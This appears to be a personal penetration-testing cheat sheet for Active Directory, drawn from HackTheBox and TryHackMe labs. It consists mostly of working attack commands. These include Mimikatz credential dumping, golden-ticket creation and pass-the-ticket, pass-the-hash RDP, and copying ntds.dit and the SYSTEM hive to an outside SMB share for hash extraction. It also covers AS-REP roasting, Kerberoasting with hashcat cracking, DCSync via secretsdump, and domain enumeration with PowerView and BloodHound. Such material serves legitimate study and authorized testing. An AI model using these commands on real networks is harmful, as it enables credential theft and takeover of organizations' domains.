Active Directory
- Active Directory Basics
- Attacking Kerberos
- Exploiting a Domain Controller
- Post exploitation tasks
mimikatz http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/
Bypassing UAC https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html
Lateral move https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/
https://medium.com/r3d-buck3t/play-with-hashes-over-pass-the-hash-attack-2030b900562d
Dante https://karol-mazurek95.medium.com/dante-guide-htb-a7dfd0387a9c
AD enum https://notes.offsec-journey.com/privilege-escalation/domain-privilege-escalation#common-misconfigurations
https://github.com/jesusgavancho/TryHackMe_and_HackTheBox/blob/master/Windows%20Local%20Persistence.md
https://benheater.com/tryhackme-exploiting-active-directory/
https://trojand.com/cheatsheet/Windows/Initial_Foothold.html
GUI - Desktop
User password reset
Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
Force a password reset at the next logon
Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose
RDP
Remotely enable RDP using CrackMapExec
sudo crackmapexec smb 10.69.88.23 -u user -p password -M rdp -o ACTION=enable
RDP through Pass-the-Hash
xfreerdp /u:USER /d:DOMAIN /pth:NTLM /v:server.domain.local
RDP using mimikatz and PtH
sekurlsa::pth /user:user /domain:domain.local /ntlm:xxxxxxxxxxxxxxx /run:"mstsc.exe /restrictedadmin"
Mimikatz
Full dump
mimikatz.exe "token::elevate" "privilege::debug" "lsadump::lsa" "lsadump::sam" "lsadump::secrets" "lsadump::cache" "sekurlsa::logonpasswords"
Run as administrator (ensure this outputs [privilege “20” ok])
privilege::debug
Dump hashes
lsadump::lsa /patch
List active user sessions
sekurlsa::logonPasswords full
Get user password hashes and export to a text file
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> c:\tmp\mimikatz_output.txt
Golden Ticket
dump the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket
Dump the krbtgt Hash (krbtgt is a kerberosable user)
lsadump::lsa /inject /name:krbtgt
Create a Golden Ticket -
kerberos::golden /user:Administrator /domain:controller.local /sid:5508500012cc005cf7082a9a89ebdfdf /krbtgt:5508500012cc005cf7082a9a89ebdfdf (service NTLM hash) /id:500
open a new command prompt with elevated privileges to all machines
misc::cmd
Pass the Ticket w/ Mimikatz
Now that we have our ticket ready we can now perform a pass the ticket attack to gain domain admin privileges.
1.) kerberos::ptt ticket
klist - Here were just verifying that we successfully impersonated the ticket by listing our cached tickets.
Ldap
Get machines names
crackmapexec smb 192.168.98.100-102
Initial info gathering
python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 192.168.98.100 -t info
nmap -n -sV --script "ldap* and not brute" 172.31.3.2 -Pn
Get naming context
# We also directly check nmap results
ldapsearch -H ldap://10.10.10.100 -x -s base namingcontexts
python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 192.168.10.100 -t info
Retrieve users (some users might be missing so worth doing a rpc request as well)
ldapsearch -x -H ldap://192.168.98.100 -D 'cyber.com' -w '' -b "DC=cyber,DC=com" > ldap_dc.txt
cat ldap_dc.txt| grep -i samaccountname | sed -e 's/samaccountname: //gi'
ldapsearch -H ldap://10.10.10.100 -x -b "dc=cyber,dc=com"
# We can also be more precised with
ldapsearch -H ldap://10.10.10.100 -x -b "dc=cyber,dc=com" '(ObjectClass=)' "sAMAccountName" | grep sAMAccountName
# Other version
ldapsearch -x -H ldap://10.10.10.100 -D 'cyber.com' -w '' -b "DC=cyber,DC=com" > ldap_dc.txt
cat ldap_dc.txt| grep -i samaccountname | sed -e 's/samaccountname: //gi'
Check ldap entries
nmap -p389 10.0.2.23 --script=ldap-search
ldapsearch -x -b "dc=cyber,dc=com" -H ldap://10.0.2.23
# For windows we can use ldapadmin
Dump ldap data
ldapdomaindump -u dictionary.csl\\izabel -p "June2013" -o ldapdomaindump_artifacts 172.31.3.4
To retrieve the password field (which might not be included in our results). We can ssh on the ldap server and run (retrieve the password save in base64)
sudo slapcat
RPC
Retrieve users entries
rpcclient 10.10.10.100
rpcclient -U '' 10.10.10.100
rpcclient -U '' -N 10.10.10.100
# enumdomusers
# querydispinfo
# querydisplayinfo
crackmapexec smb megabank.local -u '' -p '' --users
Active Directory
Query the AD (with a domain user)
nmap -p389 10.0.2.23 --script=ldap-search --script-args="ldap.username=cybex\adam,ldap.password=Blue231,qfilter=users" -Pn
We can also use jxplorer
sudo apt install jxplorer
NTDS.dit & systemHive
Method 1
Make an accessible copy of the Active Directory Database
reg save HKLM\SYSTEM C:\system.hive
Let’s copy the DB into our kali
cp ntds.dit \\IP\smb\ntds.dit
cp C:\system.hive \\IP\smb\system.hive
Let’s retrieve the hashes from it
secretsdump.py -ntds ntds.dit -system system.hive
Method 2
Make an accessible copy of the Active Directory Database
reg save HKLM\SYSTEM C:\temp\sys
use Vssadmin to copy ntds.dit
vssadmin create shadow /for=C:
Copy ntds.dit to C:\temp\
copy \\?\GLOBAL\Device\HarddiskVolumesShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit
Fix any corrupted content on our dit db
ESENTUTL /p c:\temp\dit /!1024 /8 /o
In Windows, let’s dump the hashes of all the users
powershell -eb bypass
Import-Module DSInternals
$key-Get-Bootkey -SystemHiveFilePath c:\temp\sys
Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit
More about VSS
The Volume Shadow Copy Service (VSS) takes read-only snapshots of entire volumes periodically. In the case of VSS, a volume refers to a drive letter, typically the C drive.
These snapshots are used as backup points in a similar way to ‘restore’ points found in XP and any prior version. However, unlike a standard versioning system, VSS does not allow for shadow copies of individual files to be created, dealing only in full volumes. To optimize space these shadow copies are only a difference in the state of a snapshot, not a full copy of the file structure.
Standard users have no access to the VSS. Administrators have access to vssadmin
, which can be used to create, list, and recover data from a shadow copy.
It is possible to list and recover individual files from the VSS, as per the three-step process below:
vssadmin list shadows
2.iUset VSHADOW_DEVICE=\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
for /R %VSHADOW_DEVICE%\ %i in (*) do @echo %i
(Be aware that the output is verbose)
It’s also possible to copy specific files from the Volume Shadow Copy, directly to your own local system. An example of what that command would look like has been provided below:
copy %VSHADOW_DEVICE%\Users\Administrator\Desktop\secretfile.txt c:\Users\Administrator\Desktop
VSS is useful for recovering files that have been encrypted by ransomware, logs, and files that have been removed by an attacker, or even just for accidentally deleted files.
Please refer to the following MSDN article and vssadmin usage guide for more information on the subject.
DC / KErberos
Users enum
/opt/kerbrute userenum -d brute.csl --dc 172.31.3.3 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
kerbrute -users /usr/share/seclists/Usernames/Names/names.txt -domain BRUTE -dc-ip brute.csl
GetNPUsers
GetNPUsers.py brute.csl/ -usersfile name.txt -format john -outputfile hash
python /opt/impacket/build/scripts-3.9/GetNPUsers.py brute.csl/ -usersfile users.txt -dc-ip 172.31.3.3 -outputfile hashes.asreproast
impacket-GetNPUsers -dc-ip $DC_IP -request 'htb.local/'
impacket-GetNPUsers -dc-ip $DC_IP active.htb/user -no-pass
sudo python2 GetNPUsers.py -request -format john -dc-ip 172.31.3.4 dictionary/izabel -no-pass
then crack with hashcat
hashcat hash.txt rockyou.txt
If GetNPUsers doesn’t work and we have a user with great permissions other another user, we can set the PREAUTH. Activate GetNPUsers for a user
Set-ADAccountControl -Identity user2 -DoesNotRequirePreAuth $true
Retrieve AD users
/opt/impacket/examples/GetADUsers.py -all cyber.com/ketty.ayan:thePass! -dc-ip 192.168.98.100
Kerberoasting with GetUserSPNs
impacket-GetUsersSPNs -dc-ip $DC_IP active.htb/SVC_TGS:password
# might need to adjust time on the VM
# sudo ntpdate $DC-IP
then crack with hashcat
hashcat -m 13100 hash.txt rockyou.txt -a
Secretdump
Retrieve all of the passwords hashes
impacket-secretsdump -just-dc backup:[email protected]
Tools
Start
# start
posershell -eb bypass
Import-Module .\PowerView.ps1
PowerView
Basics
Get info on the machines (part of the domain)
Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer | select operatingsystem,dnshostname
Reverse DNS (find the IP of a machine)
Resolve-IPAddress CLIENT01
Show our Domain info
Get-NetDomain
Retrieve SID of the domain
Get-DomainSID
Retrieve the Domain controller info
Get-DomainController
About the Users / Groups
Get the users
# Long list
Get-NetUser
Get-NetUser -Username "name"
# Currated list
Get-NetUser | select samaccountname,lastlogon
Get-UserProperty -Properties lastlogon
The machine where currrent user has admin
Find-LocalAdminAccess -Verbose
Find specific string in user attribute
Find-UserField -SearchTerm Description -SearchTerm "built"
Get the groups (domain)
Get-NetGroup
Get-NetGroup -Domain htb.local
Get-NetGroup | select samaccountname
Get-NetGroup *admin*
Get-NetGroup "Sales department" | select member
Get-NetGroupMember -GroupName "Domain Admins"
Who is in what groups (domain groups)
Get-NetGroup | Get-NetGroupMember
https://powersploit.readthedocs.io/en/latest/Recon/Get-NetLocalGroupMember/
Enumerate members of a local group on a remote machine (without admin privileges)
Get-NetLocalGroupMember --ComputerName client01 -GroupName mygroup (-Credential <PSCredentials>)
Get-NetLocalGroup --ComputerName client01 [-API]
User hunting: Searching in logged on accounts
# This combine multiple commands
Invoke-UserHunter
# Show who has a session on Client01
Get-NetSession -ComputerName Client01 --verbose
# Who's connected
Get-LastLoggedOn
Get-NetLoggedOn -ComputerName Client01
Get-NetLoggedOnLocal
# can also use sysinternal tools
.\PsLoggedon.exe \\client01
Search for Domain Admin
# noisy
Find-LocalAdminAccess
Enumerate commonly trafficked servers and query
stealth
Shares
Find shares
Invoke-ShareFinder
Find sensitive files in the domain
Invoke-FileFinder
Find all the file servers in the domain
Get-NetFileServer
Object Permissions, Group permissions (GPO)
GenericAll: Full perms GenericWrite: Edit certain object WriteOwner: Change ownership on an object WriteDACL: edit perms AllExtendedRights: Change password,reset password, etc… ForceChangePasssword: Password Change for Object Self: Self membership
Get the GPO
Get-NetGPO
List any admins
Find-GPOComputerAdmin -ComputerName dc01.htb.local
List anyone who can administer any machine (through GPO)
Find-GPOLocation
Organization Unit (OU)
Get-NetOU -FullData
List insteresting ACLs
Invoke-ACLScanner -ResolveGUIDs
Show anyone with GenericAll on the “management department” group
Get-ObjectAcl -SamAccountName "user1" -ResolveGUIDs
Get-ObjectAcl -Identity "Management department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"}
# Shorter version
Get-ObjectAcl -Identity "Management department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
# Other version
Get-ObjectAcl -Identity "jen" | ? {$_.ActiveDirectoryRights -eq "GenericAlll"} | select SecurityIdentifier,ActiveDirectoryRights
Translate SecIdentifier to a name
"SIDXXX","OTHER-SID" | Convert-SidToName
Change password of user on domain
net user jen Password123 /domain
Impersonate, Launch a command prompt as jen
# Runas
runas /user:corp\jen powershell.exe
Bloodhound
Start
# start
posershell -eb bypass
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp -OutputPrefix "corp_audit"
Impacket
https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/
https://neil-fox.github.io/Impacket-usage-&-detection/
lookupsid.py is a tool for brute forcing Windows SID’s which will attempt to identify remote users/groups.
Enumerate the domain with lookupsid.py
for user in $(cat users.txt); do lookupsid.py svccorp.com/$user:'Password123'@172.31.2.1; done
Secretsdump is a script used to extract credentials and secrets from a system. The main use-cases for it are the following:
Dump NTLM hash of local users (remote SAM dump) Extract domain credentials via DCSync
secretsdump.py svcorp/Administrator:mypass@IP
secretsdump.py -no-pass -just-dc svcorp/user1@IP
wmiexec.py is another script part of the Impacket framework. It is used to silently execute commands against a compromised endpoint using WMI.
python3 /opt/impacket/examples/wmiexec.py -hashes ':533f1bd576caa912bdb9da284bbc60fe' 'za.tryhackme.com/[email protected]'
python3 /opt/impacket/examples/wmiexec.py 'za.tryhackme.com/administrator:[email protected]'